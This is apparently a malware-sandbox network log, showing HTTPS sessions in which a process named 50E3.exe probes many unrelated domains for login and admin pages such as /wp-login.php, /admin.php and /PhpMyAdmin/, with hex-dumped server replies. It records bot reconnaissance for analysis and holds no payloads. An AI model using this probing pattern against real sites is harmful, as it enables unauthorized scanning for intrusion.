2023-11-30 10:22:43 UTC	1177	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port
60	192.168.2.4	65393	213.171.212.244	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:43 UTC	168	OUT	GET /wp-login.php HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:43 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:22:43 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:22:43 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
61	192.168.2.4	65440	15.197.172.60	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:43 UTC	281	OUT	GET /admin.php HTTP/1.1 Host: 1.tv Accept: / Accept-Encoding: deflate, gzip Cookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F; caf_ipaddr=10.116.88.163; country=; city="" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:43 UTC	765	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 31 37 37 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 4d 6f 6e 2c 20 31 33 20 4e 6f 76 20 32 30 32 33 20 32 33 3a 33 32 3a 34 36 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 54 61 67 3a 20 22 36 35 35 32 62 32 31 65 2d 34 39 39 22 0d 0a 58 2d 41 64 62 6c 6f 63 6b 2d 4b 65 79 3a 20 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 Data Ascii: HTTP/1.1 200 OKServer: openrestyDate: Thu, 30 Nov 2023 10:22:43 GMTContent-Type: text/htmlContent-Length: 1177Last-Modified: Mon, 13 Nov 2023 23:32:46 GMTConnection: closeETag: "6552b21e-499"X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBA
2023-11-30 10:22:43 UTC	1177	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port
62	192.168.2.4	65444	13.248.169.48	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:43 UTC	240	OUT	GET /wp-login.php HTTP/1.1 Host: 6ail.com Accept: / Accept-Encoding: deflate, gzip Cookie: expiry_partner=; caf_ipaddr=10.116.88.132; country=; city="" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:43 UTC	719	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 32 34 37 37 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 4d 6f 6e 2c 20 31 33 20 4e 6f 76 20 32 30 32 33 20 32 33 3a 33 32 3a 34 36 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 54 61 67 3a 20 22 36 35 35 32 62 32 31 65 2d 33 30 62 64 22 0d 0a 58 2d 41 64 62 6c 6f 63 6b 2d 4b 65 79 3a 20 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a Data Ascii: HTTP/1.1 200 OKServer: openrestyDate: Thu, 30 Nov 2023 10:22:43 GMTContent-Type: text/htmlContent-Length: 12477Last-Modified: Mon, 13 Nov 2023 23:32:46 GMTConnection: closeETag: "6552b21e-30bd"X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJ
2023-11-30 10:22:43 UTC	12477	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port
63	192.168.2.4	65445	194.63.248.47	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:43 UTC	169	OUT	GET /wp-login.php HTTP/1.1 Host: z-a.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:44 UTC	180	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 33 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 37 33 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenDate: Thu, 30 Nov 2023 10:22:43 GMTServer: Apache/2.4.25 (Debian)Content-Length: 273Connection: closeContent-Type: text/html; charset=iso-8859-1
2023-11-30 10:22:44 UTC	273	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 7a 2d 61 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.25 (Debian) Server at z-a.com Port 443</addres

Session ID	Source IP	Source Port	Destination IP	Destination Port
64	192.168.2.4	65392	15.197.204.56	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:43 UTC	235	OUT	GET /admin.php HTTP/1.1 Host: 96l.com Accept: / Accept-Encoding: deflate, gzip Cookie: expiry_partner=; caf_ipaddr=10.116.88.77; country=; city="" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:43 UTC	717	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 31 37 37 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 4d 6f 6e 2c 20 31 33 20 4e 6f 76 20 32 30 32 33 20 32 33 3a 33 32 3a 34 36 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 54 61 67 3a 20 22 36 35 35 32 62 32 31 65 2d 34 39 39 22 0d 0a 58 2d 41 64 62 6c 6f 63 6b 2d 4b 65 79 3a 20 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 Data Ascii: HTTP/1.1 200 OKServer: openrestyDate: Thu, 30 Nov 2023 10:22:43 GMTContent-Type: text/htmlContent-Length: 1177Last-Modified: Mon, 13 Nov 2023 23:32:46 GMTConnection: closeETag: "6552b21e-499"X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBA
2023-11-30 10:22:43 UTC	1177	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port
65	192.168.2.4	49511	3.33.224.147	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:44 UTC	161	OUT	GET /admin HTTP/1.1 Host: hna.be Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:44 UTC	370	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 70 72 69 76 61 74 65 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 34 20 47 4d 54 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 68 6e 61 2e 62 65 0d 0a 58 2d 52 61 74 65 4c 69 6d 69 74 2d 4c 69 6d 69 74 3a 20 31 32 30 30 0d 0a 58 2d 52 61 74 65 4c 69 6d 69 74 Data Ascii: HTTP/1.1 302 FoundServer: nginxContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: no-cache, privateDate: Thu, 30 Nov 2023 10:22:44 GMTLocation: https://hna.beX-RateLimit-Limit: 1200X-RateLimit
2023-11-30 10:22:44 UTC	314	IN	Data Raw: 31 32 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 73 3a 2f 2f 68 6e 61 2e 62 65 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 68 6e 61 2e 62 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 Data Ascii: 12e<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='https://hna.be'" /> <title>Redirecting to https://hna.be</title> </head> <body> Redirecting to <a href="htt

Session ID	Source IP	Source Port	Destination IP	Destination Port
66	192.168.2.4	49527	213.171.212.244	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:44 UTC	168	OUT	GET /wp-login.php HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:44 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:22:44 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:22:44 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.4	49930	213.171.212.244	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:44 UTC	165	OUT	GET /admin.php HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:44 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:22:44 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:22:44 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.4	50507	13.248.169.48	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:44 UTC	277	OUT	GET /wp-admin/ HTTP/1.1 Host: 6ail.com Accept: / Accept-Encoding: deflate, gzip Cookie: expiry_partner=; caf_ipaddr=10.116.88.132; country=; city="" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://6ail.com/wp-login.php
2023-11-30 10:22:44 UTC	719	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 32 34 37 37 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 4d 6f 6e 2c 20 31 33 20 4e 6f 76 20 32 30 32 33 20 32 33 3a 33 32 3a 34 36 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 54 61 67 3a 20 22 36 35 35 32 62 32 31 65 2d 33 30 62 64 22 0d 0a 58 2d 41 64 62 6c 6f 63 6b 2d 4b 65 79 3a 20 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a Data Ascii: HTTP/1.1 200 OKServer: openrestyDate: Thu, 30 Nov 2023 10:22:44 GMTContent-Type: text/htmlContent-Length: 12477Last-Modified: Mon, 13 Nov 2023 23:32:46 GMTConnection: closeETag: "6552b21e-30bd"X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJ
2023-11-30 10:22:44 UTC	12477	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.4	50525	104.238.144.219	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:44 UTC	170	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: nrnet.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
